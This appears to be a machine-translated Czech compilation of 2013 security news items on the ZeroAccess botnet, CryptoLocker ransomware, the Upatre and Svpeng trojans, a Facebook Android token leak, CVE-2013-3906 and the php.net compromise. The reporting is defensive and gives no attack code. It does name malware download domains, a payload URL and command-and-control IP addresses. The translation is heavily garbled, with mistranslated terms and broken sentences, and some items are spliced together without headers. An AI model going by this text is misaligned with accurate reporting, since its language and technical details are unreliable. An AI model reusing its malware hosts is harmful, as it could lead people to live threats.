16. července Symantec začal sinkholing ZeroAccess infekcí. Tato operace se rychle vyústila v odtržení více než půl milionu roboty, což výrazně snižuje počet botů ovládaných bot pána.
HROZEB ÚDAJE:
ZeroAccess botnet byl původně objeven na nebo kolem 13.července 2011. ZeroAccess je trojský kůň, který využívá pokročilé rootkit ukrýt. ZeroAccess můžete také vytvořit skrytý souborový systém, stáhněte si další malware, a otevřít zadní vrátka na ohrožena počítače.
Botnet ZeroAccess je navržen pro náklad do infikovaných počítačů. Stažené užitečná zatížení jsou primárně využívány pro účely příjmů generace (Bitcoin Těžba a Click Fraud).
Klikněte Podvod Jeden typ užitečného zatížení jsme viděli, je klikání Trojan. Trojan stáhne on-line reklamy do počítače a pak generuje umělé kliknutí na reklamy, jako by byly generovány oprávněné uživatele. Tito falešní kliknutí počítat pro vyplácení náhrad v pay-per-click (PPC), affiliate programy.
Bitcoin Těžba Virtuální měna má řadu atrakcí pro zločinci. Způsob, jakým každý Bitcoin vstoupí do existence je založena na provádění matematických operací známých jako "dobývání" na počítačového hardwaru. Tato činnost má přímý hodnotu do bot master a náklady na nic netušící oběti (zvýšil účet za elektřinu).
Hrozba je distribuován několika způsoby, pomocí drive-by-download je nejčastější způsob útoku. Ohrožena webové stránky mohou přesměrovat uživatele na škodlivé webové stránky určené k využití nic netušící uživatele a nainstalovat ZeroAccess. Uživatel může také kliknout na přílohu v e-mailu phishing, což vede ZeroAccess instalován na pozadí bez vědomí uživatele.
SOC detekčních schopností
Pro zákazníky s členskými státy IDS / IPS bezpečnostních služeb řízení, bude prodejce bázi podpisy se automaticky rozmístěny, jak na prodávajícího doporučení. Pokud máte zájem o další informace týkající se podpisových státy na svých zařízeních, nebo chcete-li požádat o aktivaci konkrétního podpisu, kontaktujte support@monitoredsecurity.com .
Pro zákazníky s monitory pouze IDS / IPS zařízení Symantec MSS nadále poskytuje bezpečnostní monitoring na tuto hrozbu.
KOMPONENTY a detekce
ZeroAccess - MSS detekce: [MSS URL Detection] Trojan.ZeroAccess CnC provozu
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (53/UDP)
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (na portu 123) (2)
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (na portu 53/123)
Hot IP - Trojan.ZeroAccess P2P botnet Node (1)
Hot IP - Trojan.ZeroAccess P2P botnet Uzel (2)
Hot IP - ZeroAccess CnC provozu
Hot IP - ZeroAccess CnC provozu (přes 123/UDP)
Hot IP - ZeroAccess CnC provozu (přes 53/UDP)
Hot IP - ZeroAccess Sinkhole činnost
ZeroAccess - Vendor detekce: Detekce od následujících dodavatelů byla pozorována MSS:
FireEye
Fortinet
IntruShield
McAfee AV
McAfee Endpoint Protection
NetScreen IDP
Palo Alto Networks Firewall
Šňupat
Symantec AV
Aplikace Symantec Endpoint Protection signatur IPS
Zmírňování a doporučení:
Společnost Symantec doporučuje zákazníkům používat vrstvený přístup k zabezpečení jejich prostředí, s využitím nejnovějších technologií, včetně Symantec Enterprise-Wide monitorování bezpečnosti od hrany k koncového bodu. Pro techniku, monitorovaných / řízen MSS, zajistit, aby všechny podpisy jsou aktuální, včetně koncových technologií. Zajistěte, aby všechny operační systémy a veřejné čelí stroje mají nejnovější bezpečnostní záplaty, a antivirový software a definice aktuální. Zajistěte systémy mají běžící firewall, jsou zbytečné porty uzavřeny / zablokovány a nevyužitých služeb jsou zakázány. Ujistěte se zaměstnanci vzděláváni o sociálním inženýrství a phishingové techniky. Co můžete očekávat od MSS:
Symantec MSS SOC bezpečnostních analytiků bude i nadále pečlivě sledovat, analyzovat a ověřovat všechny události svědčí o ZeroAccess Trojan. MSS bude i nadále provádět průběžné upřesnění detekce.
Facebook pro Android Selhávání umožnit všem aplikaci získat přístup uživatele tokeny 6.11.2013 Viry | Mobil
Výzkumník zjistil závažné zranitelnosti v hlavním Facebook a Facebook Messenger aplikací pro Android, které umožňují jiné aplikaci na zařízení pro přístup uživatele na serveru Facebook přístupový token a převzít její účet. Stejný badatel také objevil zvláštní, podobnou chybu v Facebook Pages manažer pro Android, aplikace, která umožňuje administrátorům spravovat více účtů Facebook. Že chyba umožňuje další aplikace chytit uživatele přístupový token.
Chyby byly objeveny již dříve v tomto roce Mohamed ramadánu, výzkumný pracovník na útok Secure, který nahlásili na Facebook a byl odměněn v roce 6000 dolarů chyb prémií. První chyba spočívá ve způsobu, že hlavní aplikace Facebook a Facebook Messenger aplikace pro Android zařízení zpracovává uživatele přístupový token, což je v podstatě klíčem k přístupu k účtu Facebook. Tato chyba by umožnilo škodlivý aplikaci získat access_token uložených na zařízení uživatele a ukrást uživatelský účet, Ramadán řekl.
"Představte si tento scénář: Jste uživatel Facebooku, máte android telefonu / tabletu a nainstalovali jste si facebook hlavní aplikace a posel aplikace pro Android, nyní dostal zprávu od přítele nebo od někoho na Facebooku, otevře zprávu ke čtení to a tam je připoutání jako: film, doc, pdf, pic, nebo všechny soubory, které mohou být spojeny ve zprávách facebooku, "Ramadán řekl v blogu vysvětluje exploitu scénář.
"Vy jste klikli na soubor ke stažení, a zároveň váš facebook access_token unikly logcat android což znamená, že každý android aplikace mohou číst a zachytit vaše facebook access_token kradmý a přesměrovat váš účet."
"Pokud nechcete vědět, co je logcat, je to nástroj, postavený na všech Android zařízení, sbírat zprávy protokolu ze všech Android aplikací."
Ramadán řekl, že Facebook access_tokens nezanikají, což znamená, že přetrvává nebezpečí, na dobu neurčitou, pokud má uživatel neaktualizoval své Facebook aplikace na opravu této chyby.
Druhá chyba je v Facebook Pages Správce aplikace pro Android, který je určen na pomoc uživatelům spravovat několik různých účtů. Aplikace, které bylo nainstalováno více než 10 milionů krát, má podobnou vadu na hlavní aplikaci Facebook, která umožňuje škodlivý aplikaci získat přístup uživatele access_token, ale v tomto případě, že uživatel nemusí stáhnout nebo spustit libovolný kód z kdekoliv jinde.
To zranitelnost byla oprava stejně, a Ramadán řekl uživatelé by měli aktualizovat své aplikace, aby bylo možno chránit před útoky. Ramadan letos objevili chybu zabezpečení aplikací Facebook a Facebook Messenger app, který umožnil útočníkovi přístup a stáhnout uživatelovy fotografií .
Útoky na New Microsoft Zero Day Použití vícestupňových malware
6.11.2013 Počítačový útok | Viry
Útočníci vykořisťovat Microsoft Windows a Office nula den odhalil včera používáte exploit, který obsahuje škodlivý soubor RAR, stejně jako falešný dokument Office jako návnadu, a instalujete širokou škálu škodlivých komponent na nově infikovaných systémů. Útoky vidět tak daleko jsou zaměřeny hlavně v Pákistánu.
CVE-2013-3906 zranitelnost zveřejněna úterý Microsoft, je vzdálené spuštění kódu chyba, která se týká způsobu, jakým systém Windows a Office zvládnout některé TIFF soubory. Microsoft uvedl, že útočníci, kteří jsou schopni zneužít chybu by měl být schopen spustit libovolný kód v napadených počítačů. V cílených útoků vidět výzkumníky tak daleko, útočníci se pomocí ROP technik tuto chybu zabezpečení zneužít a pak instalaci downloader, který táhne dolů některé další součásti, včetně dokumentu sady Office, který je zobrazen uživateli jako rozptýlení od toho, co se děje v pozadí.
Výzkumníci analyzovali AlienVault exploit a malware používán v cílených útoků a zjistil, že poté, co útočníci ohrožena stroj, ale také stáhnout soubor RAR, který obsahuje komponenty, které volá zpátky na velení a řízení serveru a stáhne počet škodlivých komponent. Malware nainstaluje keylogger, vzdálené backdoor a část, která krade různé typy souborů, včetně XLS, DOC, PPT a PDF soubory.
CVE-2013-3906 chyba zabezpečení se týká Windows Vista a Office 2003-2010 a Microsoft doporučuje, aby uživatelé se systémem zranitelné verze nainstalovat nástroj Fixit oni pustili úterý, což pomáhá zabránit vykořisťování. Instalace Emet nástrojů lze také chránit uživatele proti útokům na této chyby zabezpečení.
Většina IP připojují k C & Cs používané v těchto útoků, jsou zasílány z Pákistánu, AlienVault vědci. Výzkumníci společnosti Kaspersky Lab analyzoval malware a jeho chování a našel nějaké zajímavé chování.
"Tohle není první chyba ve formátu TIFF. Notoricky známý CVE-2010-0188 (na základě TIFF taky) je široce používán v PDF využije i nyní. Nový 0den používá chybně TIFF údajů obsažených v dokumentech sady Office, aby se spustit shell kód pomocí haldy sprej a ROP techniky. Již jsme zkoumali některé shellcodes - vykonávají společné akce (pro shellcodes): Vyhledat API funkcí, stáhněte a spusťte náklad. Vzali jsme si pohled na stažené nákladem - zadní vrátka a trojských-špioni. Naše AEP technologie zabraňuje spuštění jakéhokoli spustitelného souboru využívaných aplikací. V tomto případě je naše AEP chránit a nadále chrání uživatele příliš, "řekl Vjačeslav Zakorzhevsky, vedoucí skupiny zranitelnosti výzkumu v Kaspersky.
US-CERT varuje CryptoLocker infekce na vzestupu 6.11.2013 Viry
CryptoLocker je nevyzpytatelný vývoj se známými Ransomware systémech, ve kterých malware šifruje soubory, které najde na řadě síťových zdrojů a požaduje výkupné za dešifrovací klíč.
US-CERT vydalo poradenské firmy dnes varovné a spotřebitele rizik představovaných CryptoLocker, který byl na radaru bezpečnostních expertů od konce října. US-CERT řekl infekce jsou na vzestupu a vyzýváme oběti neplatit výkupné, místo toho, nahlaste to na internetu Center FBI kriminality stížnosti.
Oběti, mezitím, mít tři dny na na splátky s útočníky, a to buď prostřednictvím MoneyPak nebo Bitcoin.
"Některé oběti prohlašovali, online, které jsou placené útočníky a nedostali slíbené dešifrovací klíč," US-CERT poradenství řekl.
CryptoLocker se šíří prostřednictvím řady podvodných akcí, včetně některých z legitimní podnikání, nebo prostřednictvím falešné Federal Express nebo UPS sledování oznámení. Některé oběti řekl CryptoLocker se objevil po samostatném botnet infekci, US-CERT řekl.
Malware čichá se soubory v řadě síťových zdrojů, včetně sdílených síťových disků, výměnná média, jako jsou USB flashdisky, externí pevné disky, sdílených síťových souborů a některých služeb cloud storage.
"Pokud jeden počítač v síti nakazí, může namapované síťové jednotky také nakazit," US-CERT varuje poradenství s tím, že oběti by měly okamžitě odpojit své počítače od jejich drátových nebo bezdrátových sítích okamžitě při pohledu na červenou obrazovkou oznámení smířit podle CryptoLocker, který poskytuje informace o tom, jak obnovit šifrované soubory.
Jakmile malware západky na počítač oběti, to se připojí na útočníkův příkazu serveru a ukládá asymetrické šifrovací klíč, který by uvolnil oběti soubory.
Costin Raiu, ředitel Global Research and Analysis Team na Kaspersky Lab, řekl CryptoLocker používá doménu algoritmus generace dává malware až 1000 možných doménových jmen, z nichž se připojit k jeho velení a řízení infrastruktury. Raiu dodal, že Kaspersky sinkholed tři domény a sledovat více než 2700 domén se snaží kontaktovat tyto domény během tří dnů v polovině října se většina obětí v USA a Velké Británii.
Malware jako CryptoLocker není bez precedentu. GPCode malware používá RSA klíčů pro šifrování, počínaje 660-bit RSA před upgradem na 1024, "uvedení snad jen v říši praskání moci NSA," řekl Raiu.
"CryptoLocker používá pevný šifrovací schéma stejně, což doposud jeví uncrackable," Raiu přidán.
Mezitím, bezpečnostní blog Krebs o bezpečnosti dnes oznámila, že útočníci stojí za CryptoLocker mohou být na jejich zmírnění uloženého 72hodinové lhůtě splatnosti. Vzhledem k tomu, že útočníci požadovat platbu prostřednictvím třetích stran, možnosti, které oběti nemusí být obeznámeni s, mohlo by se stát, že útočníci přišli o nějaké peníze.
"Rozhodli se, že je trochu smysl nepřijímá výkupné týden později v případě, že oběť je stále ochoten zaplatit, aby si své soubory zpět," Lawrence z BleepingComputer.com Abrams řekl Krebs. Abrams dodal, že zatímco CERT a někteří prodejci mohou být poradenství obětem neplatit, některé jsou zával, protože si nemohou dovolit být bez svých ztracených souborů pro značné množství času.
Upatre Trojan ke stažení Malware Malware, že stažení
6.11.2013 Viry
Výzkumníci z Microsoft Malware Protection Center (MMPC) viděli nárůst počtu Win/32.Upatre infekcí v posledních měsících. Trojský kůň ohrožuje hostitelských počítačích, pomocí škodlivých e-mailových příloh a po instalaci se pohybuje stáhnout jiný malware z jeho velení a řízení serveru.
Upatre Report Count
Spam kampaň distribuce Upatre s těmito škodlivými přílohami, kde "<variable names>" mohou být domény, firemní a individuální jména, nebo i náhodných písmen nebo slov:. USPS_Label_ <random number> zip, USPS - Zmeškané balíček delivery.zip , prohlášení o Account.zip, <number> -.... <number> zip, TAX_ <variable names> zip, Case_ <random number> zip, Remit_ <variable names> zip, ATO_TAX.zip a ATO_TAX_ <názvy proměnných >. zip.
Telemetrie údaje naznačují, že Upatre je správci přinášejí trojan s exploit kity zaměřené Java a PDF chyby stejně.
Podle MMPC, Upatre je především vedení pro zajištění dalšího škodlivého softwaru. Tak daleko, jeho oblíbená dodávka "Win32/Zbot.gen! AM," rodina malware, který krade přihlašovací údaje a případně postoupí kontrolu nad infikovaných počítačů k útočníkovi. Více nedávno, vědci viděli trojan instalaci "TrojanDropper: Win32/Rovnix.I" stejně. Rovnix píše škodlivého kódu NewTechnologyFileSystem (NTFS) boot sektor údajně injekčně kód do explorer.exe, aby bylo možné stahovat další malware z domény 'youtubeflashserver [dot] com "pokaždé infikovaný počítač restartuje.
Upatre táhne tento malware z řady oblastí, včetně mytarta [dot] com, cyclivate [dot] com, pentruder [dot] co [dot] cz a huyontop [dot] com.
Malware Zbot historicky nasazen domény generace algoritmus detekce otřesů, jak to stáhne jeho aktualizace. V MMPC vědci tvrdí, že se stále příliš stahovat další malware, na první kus Bitcoin-přebírající ransomware známý jako CryptoLock , ale později "Trojan: Win32/Necurs.A" stejně, kus malware, o které je dosud známo jen málo .
Upatre je téměř výlučně americký problém, se téměř 97 procent infekci dochází tam. Ve velmi vzdálené druhé, třetí, čtvrté, páté a pořadí jsou Spojené království (0,89 procenta), Kanada (0,46 procenta), Austrálie (0,27 procenta) a Japonsko (0,19 procenta).
Android Banking Trojan Svpeng Goes phishingu
6.11.2013 Viry | Phishing
Bankovní Android Trojan známý jako Svpeng přidal phishing schopnosti svého arzenálu a výzkumníci našli to útočí ruské bankovní klienty v tom, co je vnímáno být běh na sucho, než je přizpůsoben i pro další země.
"Obvykle však zločinci první test spustit technologii na ruském sektoru na internetu a poté rozválejte na celém světě, napadat uživatele v jiných zemích," řekl výzkumník Kaspersky Lab Roman Unuchek na Securelist blogu dnes.
Unuchek řekl Trojan, který se šíří přes SMS spamu, má nový kód, který kontroluje jazykovou verzi operačního systému na počítači oběti, aby bylo možné přizpůsobit jeho zpráv ve správném jazyce. Pro tuto chvíli, malware se zdá být zájem v USA, němčině, běloruské a ukrajinské oběti.
Phishing je velká inovace pro Svpeng, také známý jako Trojan-SMS.AndroidOS.Svpeng. Android uživatelé v Rusku, kteří jsou infikováni budou prezentovány s phishing oknem po zahájení jejich bankovní aplikace. Okno žádá oběti uživatelského jména a hesla, která je pak odeslána do centrálního serveru, který patří k útočníkovi.
Unuchek také řekl, že Trojan se snaží ukrást bankovní kartě vrstvení phishing okna přes Google Play, když je to běh na uživatele mobilních zařízení. Okno vyzve uživatele k zadání jeho kreditní karty nebo bankovní karty informace včetně data expirace a CVC číslo, což je také dárkovém balení na útočníkův velení a řízení serveru.
Malware je také schopen vydávat příkazy k převodu peněz z účtu oběti na útočníka. Unuchek říkal, že to dělá tak, že posílání SMS zpráv na čísla patřící k dvojici ruských bank.
"Tímto způsobem se kontroluje, zda karty těchto bank jsou připojeny k počtu infikovaného telefonu dozvídá, rovnováhu a odešle ji ke škodlivému C & C serveru," Unuchek napsal. "Pokud je telefon připojen k bankovní kartou, může přijít příkazy od C & C převést peníze z uživatelského účtu na jeho / její mobilní účet nebo na bankovní účet kybernetických zločinců". Mezi zločinci pak může odeslat peníze do digitální peněženky a proplatit dovnitř "
Svpeng může brzy vypuknout za ruské hranice, Kaspersky vědci našli novou chování malwaru, zahájením úprav na základě umístění.
Unuchek řekl, že byli 50 úpravy Svpeng do tří měsíců malware byl sledovány. Útočníci jsou skálopevně přesvědčen o udržení Trojan aktivní, používá deviceAdmin Android nástroj, aby se zabránilo bezpečnostní produkty od odstranění. To také zabrání uživateli zakázat deviceAdmin nebo obnovení továrního nastavení využívá dosud neznámou chybu zabezpečení v systému Android Unuchek řekl.
Mobilní malware používá v kampani proti sabotáži hackerů na Středním východě 05.11.2013 Viry | Mobil
Po četných pokusech sabotovat Oct26 řidičský kampaně on-line, opakovaným hackování stránek / účtů, jakož i znehodnocení internetových stránek, které zahrnovaly oficiální internetové stránky pro kampaň hxxp :/ / www.Oct26driving.com dvakrát v rozpětí několika dní. Další pokusy vykolejit pohybu jsou nyní přichází na světlo. Hacker (y) neodradí pouhým aktem znehodnocení lokalit také vytvořili a vydali malware k šíření svého poselství. Jedním takovým příkladem je objev McAfee Mobile Security v Android / HackDrive. Oct26thMobileMalware
Malware byl přestrojený za app na podporu online kampaň, i pomocí ikony, která se stala symbolem pohybu 26.října Driving kampaně, ale ve skutečnosti byl navržen tak, aby rozšířil stejnou nenávistnou propagandu, která byla umístěna na hacknutý / Znehodnocené stránky to byl distribuován od. Na instalaci malware aktivuje, jakmile byla sluchátka zapojená Rozjezd o rušení zvuku opakovaným přehráváním předdefinované zvukové sekvence, takže je možné poslouchat cokoliv jiného na zařízení nebo provádět telefonní rozhovor, hrozba také zobrazuje další zprávy v arabském textu podobně jako zprávy používané v hacknutý internetových stránkách. Kupodivu tam byl další funkce vytyčil v škodlivého kódu. Aplikace měl možnost projít databázi kontaktů hledají jména, telefonní čísla na infikovaného zařízení, doprovází to schopnost, aby data byla zaúčtována do vzdálené webové stránky, ale kupodivu i když tam byl kód, aplikace ne ve skutečnosti Vyzýváme funkčnosti. To vyvolává otázku, je tato práce probíhá a bude novější verze mají další funkce. Na povrchu dovádění používané v aplikaci a na webových stránkách zašpinění se může zdát pro mladistvé, ale nenechme se mýlit, je to nenávist a nedotýká se projevuje do app. McAfee pozorně sleduje situaci pro další rozvoj a vyzýváme uživatele vykonávat opatrnosti při pokusu stahovat žádný software, který je svázán s žádnou politickou nebo aktivista kampaně.
Cryptolocker podvodníci nabízejí obětem druhou šanci
5.11.2013 Viry
Zločinci stojí za Cryptolocker, destruktivní Ransomware, který v poslední době zaměřuje většinou americké a britské uživatelů PC, se snaží vydělat více peněz tím, že nabízí uživatelům, kteří původně rozhodl, že platit za jejich soubory dešifrovat šanci změnit svůj názor. Jak Možná si vzpomenete, Cryptolocker je zaměřena na organizace, místo domácích uživatelů, protože šifruje soubory, s největší pravděpodobností mít zásadní význam pro organizace, jako jsou kancelářské soubory, soubory s digitálním certifikátem, AutoCAD soubory, atd, a e-mailové kampaně dodává, že podporuje tuto teorii. "Pro každý soubor odpovídající jeden z těchto modelů bude malware vygenerovat nový 256 bitového klíče AES. Tento klíč pak bude použit k zašifrování obsahu souboru pomocí algoritmu AES, "vědci vysvětlit , kdy byl poprvé objeven malware. " AES klíč je pak zašifrován unikátní veřejný klíč RSA získané dříve. Jak RSA šifrovaný AES klíč, stejně jako AES šifrovaný obsah souboru spolu s některými dalšími informacemi hlavičky jsou pak zapsány zpět do souboru. V neposlední řadě se malware přihlásit šifrování souboru ve HKEY_CURRENT_USER \ Software \ CryptoLocker \ Files klíče registru. Tento klíč je později používán malware předložit seznam šifrovaných souborů pro uživatele a pro urychlení dešifrování. " Bohužel pro uživatele, RSA veřejný klíč vytvořený pro jejich systém je pouze známo, že útočníky, protože je uložen na C & C serveru malware nahrál na, a uživatelé jsou vyzváni k zaplacení 300 dolarů / euro (nebo 2 Bitcoiny), aby ji přijmout. Nabídka obvykle znamená po dobu 72 hodin, po které se podvodníci tvrdí, klíč se smaže navždy. Ale podle Paula Ducklin , který mohl být planá výhrůžka, jak podvodníci nyní nastavit CryptoLocker dešifrování služba, kde obětí Můžete nahrát jeden ze svých šifrovaných souborů a čekat na zločince oznámit, pokud je jejich klíč naleznete. Pokud je možné, uživatel bude muset zaplatit ještě větší cenu.: 10 Bitcoiny (v současné době kolem 2220 dolar) Zda toto "service" skutečně funguje a zda podvodníci pošle klíč v případě, že oběť se rozhodl zaplatí neznámé. Nejlepší zmírnění proti nepříznivým účinkům Cryptolocker a Ransomware obecně může mít na vašem počítači je stále pravidelně aktualizovat vaše důležité soubory.
Kaspersky vlajky TCPIP.SYS jako malware 5.11.2013 Viry
Jeden z našich čtenářů se nás upozornil na skutečnost, že Kaspersky AV označil Tcpip.sys jako malware na svých Windows 7 32bit hostitelů - je soubor označen jako " HEUR: Trojan.Win32.Generic "
Naštěstí Microsoft Windows funkce Ochrana souborů (http://support.microsoft.com/kb/222193) jej z karantény tento kritický soubor, ale jeho koncoví uživatelé byli léčeni na chybové zprávy (oba z AV a od OS Hádám)
Jeho verze Kaspersky je Checkpoint OEM verze, ale zdá se, že problém Kaspersky, ne Checkpoint specifické.
Kaspersky ověřil (https://twitter.com/kaspersky/status/393777843341393920), že je to vyřešeno v poslední aktualizaci. Vidíte-li tento problém vyřešit, získejte AV na "volat domů" pro opravy!
Aktualizace: Barracuda zaslali podrobnější analýzu a zachycování paketů o tom, že php.net mohla být skutečně compromissed a vydal škodlivý flash soubor: http://barracudalabs.com/2013/10/php-net-compromise/ (thx David pro poukazuje na to)
Dneska, Google měl php.net přidal do svého seznamu škodlivých stránek. Seznam byl výsledek falešně pozitivní spouští obfuscated soubor JavaScriptu, který je legitimní součástí webu php.net. V tomto bodě, falešně pozitivní se zdá být vyřešen.
Je smutné, že Google je notoricky pomalý při odstraňování falešných poplachů takhle. Pomáhá v případě, že správce stránek je podepsán s Google Webmaster Tools. V tomto případě může být žádost o přezkoumání se podává prostřednictvím Nástrojů pro webmastery a správce bude informován prostřednictvím e-mailu, pokud je přidán web na černou listinu.
ISC obdržela podání od Zacha z Perl / Shellbot.B trojan jemuž fallencrafts [.] Info / download / himad.png [ 1 ]. Trojan má omezený detekce na VirusTotal [ 2 ] a skript obsahuje "hostauth" z sosick [.] net [ 3 ] a IRC server, na kterém ohroženy systémy, které se připojujete, nachází na 89.248.172.144. To, co máme tak daleko, zdá se, že je využívá starší verze Plesk.
Aktualizovat
Tento Bot zneužít zranitelnost v Horde / IMP Plesk webmail, možná budete chtít zkontrolovat systémové protokoly známky serveru se mohou připojit k odchozí fallencrafts [.] Informace, které se zdá být využití Plesk [ 4 ] zranitelnost a možná další připojení do 93.174.88.125 kterém hodně aktivity byly hlášeny DShield za poslední 3 dny.
Cryptolocker Update, Žádost o informace 5.11.2013 Viry
To bylo stručně zmíněno v předchozí vysílání, ale Cryptolocker Ransomware je stále silné. V podstatě po infekci se šifruje všechny soubory "dokumentu" na základě přípony souboru a pak dává uživateli 72 hodin zaplatit výkupné ($ 300 USD nebo 2 BTC). Je to jeden z mála f kusů ransomware, který dělá šifrování doprava tak v současné době, krátký platit výkupné, není tam žádný jiný prostředek k dešifrování. pípání počítače je dobré napsat, ale nižší, než jsou TL, DR upozorní.
Jestliže jste nakaženi a soubory jsou zašifrovány (a nemáte žádné zálohy) je velmi omezené prostředky k obnovení souborů v aplikaci Microsoft kopií stínových Objem (Windows XP SP2 nebo vyšší). V podstatě lze říci, předchozí verze souborů přetrvávají v systému a může být využit ručně nebo pomocí nástroje, jako je stín Explorer .
Jiné, než to, že není v žádném případě v současné době k dispozici pro využití (kromě placení). Reinfecting jakmile vyprší časovač nebude resetovat timer a tam byly žádné zprávy o zotavení po znatelné množství času uplynulo 72 hodin. (Někteří omezené množství hodin hry mohou pomoci na okraji společnosti, ale protivníci říkají, že odstranit a očistit klíče a není tam žádný důkaz že to není pravda).
Tam jsou některé nastavení GPO můžete nasadit, aby se zabránilo tento druh infekce a pro nejvíce se rozdělit, některá z těchto nastavení jsou nejlepší postupy nezávisle Cryptolocker. V podstatě můžete zabránit provedení executibles v dočasných adresářích jehož podrobnosti jsou v pípání počítače .
Existují různé způsoby, které systémy se infikovala, na jednom místě to bylo UPS / FedEx styl spam, teď to vypadá, leze Zbot a dalších souvisejících nástrojů. V tomto bodě anti-virus má slušnou detekci takže udržet, že až do dnešního dne je významná pomoc.
Zdá se, že útočníci jsou také dávat pozor na různých fórech, ale není tam žádný přímý způsob, jak s nimi komunikovat.
ŽÁDOST: Pokud vy nebo vaše organizace zaplatil výkupné dešifrovat, rádi bychom s tebou mluvit (anonymně) o zkušenostech. Pište prosím přímo na bambenek / v / gmail.com
Vědci sinkhole několik Cryptolocker C & C 5.11.2013 Viry
Fotoaparát Cyber podvodníci stojí za Cryptolocker , jeden z nejnovějších Ransomware hrozbami, mají mnoho úspěchů v infikování PC uživatelům smrtící malware, ale zda oběti vysázet peníze, nebo ne, je stále neznámý. Podle společnosti Kaspersky Lab výzkumníků, malware je šifrovací schéma ještě musí být popraskané a ještě otázka je, zda to může být. "Pro každou oběť, připojí se jeho velení a řízení (C2) ke stažení RSA veřejný klíč, který se používá k šifrování dat. Pro každou novou oběť je další unikátní klíč vytvořen a pouze Cryptolocker autoři mají přístup k dešifrování klíče, " vysvětluje expert Costin Raiu. Oběti jsou si vědomi, že mají tři dny splatit, jinak je šifrovací klíč je zničena, a jejich soubory jsou ztraceny navždy pokud nebyly provedeny zálohu:
Ale otázka, že mnoho výzkumníků chcete zodpovědět, je, kolik uživatelů pádu na pasti a nakonec na krku Cryptolocker? Využitím malware domény algoritmus generace, které bylo zpětně analyzován podle Dimiter Andonov ThreatTrack Security, Kaspersky vědci podařilo závrtu třech oblastech které slouží jako C & C servery pro malware. Oni zjistili, že za pouhé čtyři dny, byli kontaktováni z 2764 unikátních adres IP obětí, většinou z USA, Velké Británii, Indii a Kanadě. však poukazují na to, je-li obětí rychle reagovat, mohou zabránit škodlivému softwaru šifrování souborů. "Pokud jsou vaše údaje jsou již šifrována, nejhorší věc, kterou musíte udělat, je zaplatit padouchy. To podnítí jim umožní rozšířit a posílit útok techniky," Raiu poukazuje na to, že tím, že to nejlepší, co člověk může udělat se chránit před touto hrozbou je, aby jejich AV a hostitele IPS aktualizovány a zálohovat pravidelně.
WhatsApp je jedním z nejoblíbenějších instant-messaging služby tam, a jeho obrovské uživatelské základně (více než 300 milionů aktivních uživatelů) umožňuje WhatsApp-themed spam skvělý způsob, jak infikovat velké množství počítačů. Poslední z těchto spamových kampaní je v současné době doručovat e-maily, prohlašovat, že má uživatel "Voice Message Notification / 1 Nová hlasová zpráva" Čekání ve svých schránkách, které jsou připojeny k e-mailu:
Bohužel, podle Webroot , falešný hlas mailu obsahuje Trojan downloader, který se pokouší stáhnout další malware z dobře známého C & C serveru. Jedinou dobrou zprávou v tom všem je, že tento konkrétní malware varianta má vysokou míru detekce a je více než pravděpodobné, že bude detekován většina AV řešení. Samozřejmě, že ne všichni uživatelé používají jeden, a jsou v nebezpečí, jak se dostat vědro jiný malware na svých strojích.
Fraudware virus cílení Android uživatelé v Číně a jihovýchodní Asii 4.11.2013 Mobil | Viry
NQ Mobile identifikovala, "Poznej App," nový virus hrozba fraudware zaměření Android uživatelé v Číně a některé země v jihovýchodní Asii. "Poznej App," identifikován jako a.frau.longjian.a, zdá Android uživatelům aktualizaci k extrémně populární NetDragon 91 Assistant app. Pokud se uživatel rozhodne pro aktualizaci této podvodné aplikace, automaticky se stáhne další přebalených aplikace na pozadí, které spotřebovávají data uživatele. Hlavní hanebné chování těchto přeměněných aplikací jsou:
Přihlásit se k odběru poplatků založených služeb prostřednictvím SMS bez vědomí uživatele, což má za následek nechtěné vyúčtování poplatků Přístup a sbírat různé informace o zařízení uživatele, jako například informace o telefonu (např. telefonní číslo, IMEI, IMSI) a uživatelská aplikace, napadající soukromí uživatele. V době, kdy identifikace a očkování, se počet infekcí byly identifikovány jako 193 uživatelů v kombinaci pevninské Číny, Angola, Hong Kongu, Iráku, Macao, Malajsie, Singapuru, Tchaj-wanu a Vietnamu.
PHP.net ohrožena sloužit malware 4.11.2013 Viry
Ve čtvrtek, Google Bezpečného prohlížení služba začala varující návštěvníky php.net , že web byl objeven slouží malware. Zpočátku většina lidí a PHP údržbáři si myslel, že to byl falešně pozitivní, ale následné šetření potvrdilo, že některé z projektu serverech se dostat ohrožena.
Hackeři se podařilo injekčních škodlivý JavaScript kód ( userprefs.js ) ve čtyřech stránek s. Když návštěvníci přistál na ně, kód umožnila automatickou detekci zranitelné moduly plug-in, a servírování škodlivých souborů SWF. Je zajímavé poznamenat, že pouze stolních prohlížečů Uživatelé byli zaměřeny - ti, kteří navštívili napadené stránky s mobilním prohlížeči byli v bezpečí. Barracuda Networks vědci podařilo dostat své ruce na soubor zachycování paketů, a pokud ji jiným výzkumným k analýze. Kaspersky Lab Fabio Assolini poznamenat , že škodlivý iFrame poukázal na Kit Magnitude Exploit a upustil variantu Tepfer informací krást Trojan s nízkou AV objasněnosti. Tým PHP je stále vyšetřuje vniknutí a poznamenal, že první myšlenka kompromis byl falešně pozitivní vzhledem k obtěžování JavaScript době pouze pravidelně injekčně. V nedávném aktuální informace o situaci, ale potvrdil, že server, který hostil php.net , static.php.net a git.php.net doménu a server hosting bugs.php.net mohla být ohrožena, ale stále nevím, mají to stalo. "Ověřili jsme si, že náš repozitář nebyla ohrožena, a zůstává v režimu pouze pro čtení, jak jsou služby přivedl zpět v plné výši, "oni sdílí . "Jak je možné, že útočníci mohou mít přístup soukromý klíč certifikátu SSL php.net jsme zrušit okamžitě. Jsme v procesu získání nového certifikátu, a očekávají, že k obnovení přístupu k php.net stránky, které vyžadují SSL (včetně bugs.php.net a wiki.php.net ) v nejbližších hodinách. " Mají také všechny služby stěhovali na nové servery. "JavaScript malware byl doručen na malé procento z php.net uživatelů od 22. do 24. října 2013 "sdíleli s tím, že v průběhu několika příštích dnů budou vynutit obnovení hesla z php.net uživatelů.
Fraudware virus cílení Android uživatelé v Číně a jihovýchodní Asii 16.10.2013 Viry | Mobil
